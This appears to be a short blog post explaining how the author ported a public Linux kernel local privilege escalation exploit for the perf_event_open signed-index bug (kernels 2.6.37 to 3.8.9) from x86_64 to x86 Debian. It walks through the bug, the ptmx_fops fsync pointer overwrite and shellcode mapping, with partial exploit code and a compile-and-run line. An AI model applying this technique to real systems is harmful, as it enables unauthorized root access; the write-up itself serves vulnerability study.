TL;DR: (perf_ptmx.c)

Last week on HN a link to a linux local privilege escalation exploit was posted, exploit which affects all linux versions between 2.6.37 and 3.8.9 compiled with PERF_EVENTS enabled. Some distros backported the bug to older kernel versions too, I tested CentOS 2.6.32-358.el6.x86_64 as vulnerable. The security issue is located in kernel/events/core.c, and it has been introduced in a commit which added the functions perf_swevent_init and sw_perf_event_destroy.

The problem lies in the fact that the value event->attr.config, which is stored in the struct perf_event_attr as u64, is being checked for validity after being casted to a signed int. The check is done with:

if (event_id > PERF_COUNT_SW_MAX)
  return -ENOENT;

This means that any value of event->attr.config which has in the lower 4 bytes a negative value will pass the check and will later be used as index for the array perf_swevent_enabled. Known the address of the base of the array, it is possible (with some limitations) to increment/decrement arbitrary memory locations in kernel space. The vulnerability was fixed just changing the event_id type to u64.

Full credit to for releasing the exploit (linked above). The original exploit targets specifically the x86_64 architecture, and I’ve now ported it to x86 Debian. The original version worked by incrementing the highest 4 bytes base_hi in the x86_64 IDT entry of interrupt 4, from 0xffffffff to 0x00000000, and then mapping the corresponding memory region in userspace, filling it with some shellcode to raise the privileges of the running process.

struct _idt_entry_64 {
  unsigned short base_lo;
  unsigned short sel;
  unsigned char unused;
  unsigned char flags;
  unsigned short base_mi;
  unsigned int base_hi;
  unsigned int zero;
} __attribute__((packed));

struct _idt_entry {
  unsigned short base_lo;
  unsigned short sel;
  unsigned char unused;
  unsigned char flags;
  unsigned short base_hi;
} __attribute__((packed));

Since on x86 the IDT struct is different from the x86_64 one this approach can’t be used. On Debian perf_swevent_enabled is a pointer to a struct of 4 bytes, so targeting IDT makes no sense because even if we can increment any memory location multiple times (check the next paragraph to see how), base_hi (of any interrupt) could be incremented only pointing to flags (because the granularity of the pointer we can manipulate is 4 bytes and the IDT is aligned in memory), therefore requiring more than 64k increments to increase base_hi only by 1.

An idea from /u/spender is to call multiple times perf_event_open while keeping the file descriptors open, avoiding the destroy callback which will revert the change done in the init function. In this way is is possible to increment a value in kernel space multiple times. This has the drawback of the process hitting the maximum number of open file descriptors allowed very fast, so some forking is required. I browsed a bit the kernel source to find a function pointer initialized to zero which was not stored in read only memory, and I chose to leverage drivers/tty/pty.c, a driver for ptmx devices, which is enabled in the default Debian kernel and has struct file_operations ptmx_fops, which has some NULL pointers and more importantly is not in read only memory.

/* 56 is offset of fsync in struct file_operations */
int target = pmtx_ops + 56;
int payload = -((perf_table - target)/4)

struct perf_event_attr event_attr;
event_attr.config = payload;
/* many many times */
syscall(__NR_perf_event_open, &event_attr, 0, -1, -1, 0);
int ptmx = open("/dev/ptmx", O_RDWR);

The exploit resolves a few symbols names using, maps some memory at 0x10000 right after vm.mmap_min_addr and fills it with privilege escalation code, then computes the offset of the fsync pointer for the pseudo terminal device in relation to perf_swevent_enabled. The syscall perf_event_open is called exactly 0x10000 times spread among multiple processes. The shellcode is then executed opening /dev/ptmx and calling fsync on it. When the processes terminate/close the fd returned by the syscall, clean up will be done automatically by sw_perf_event_destroy.

source code, gcc perf_ptmx.c && ./a.out.


You should follow me on twitter: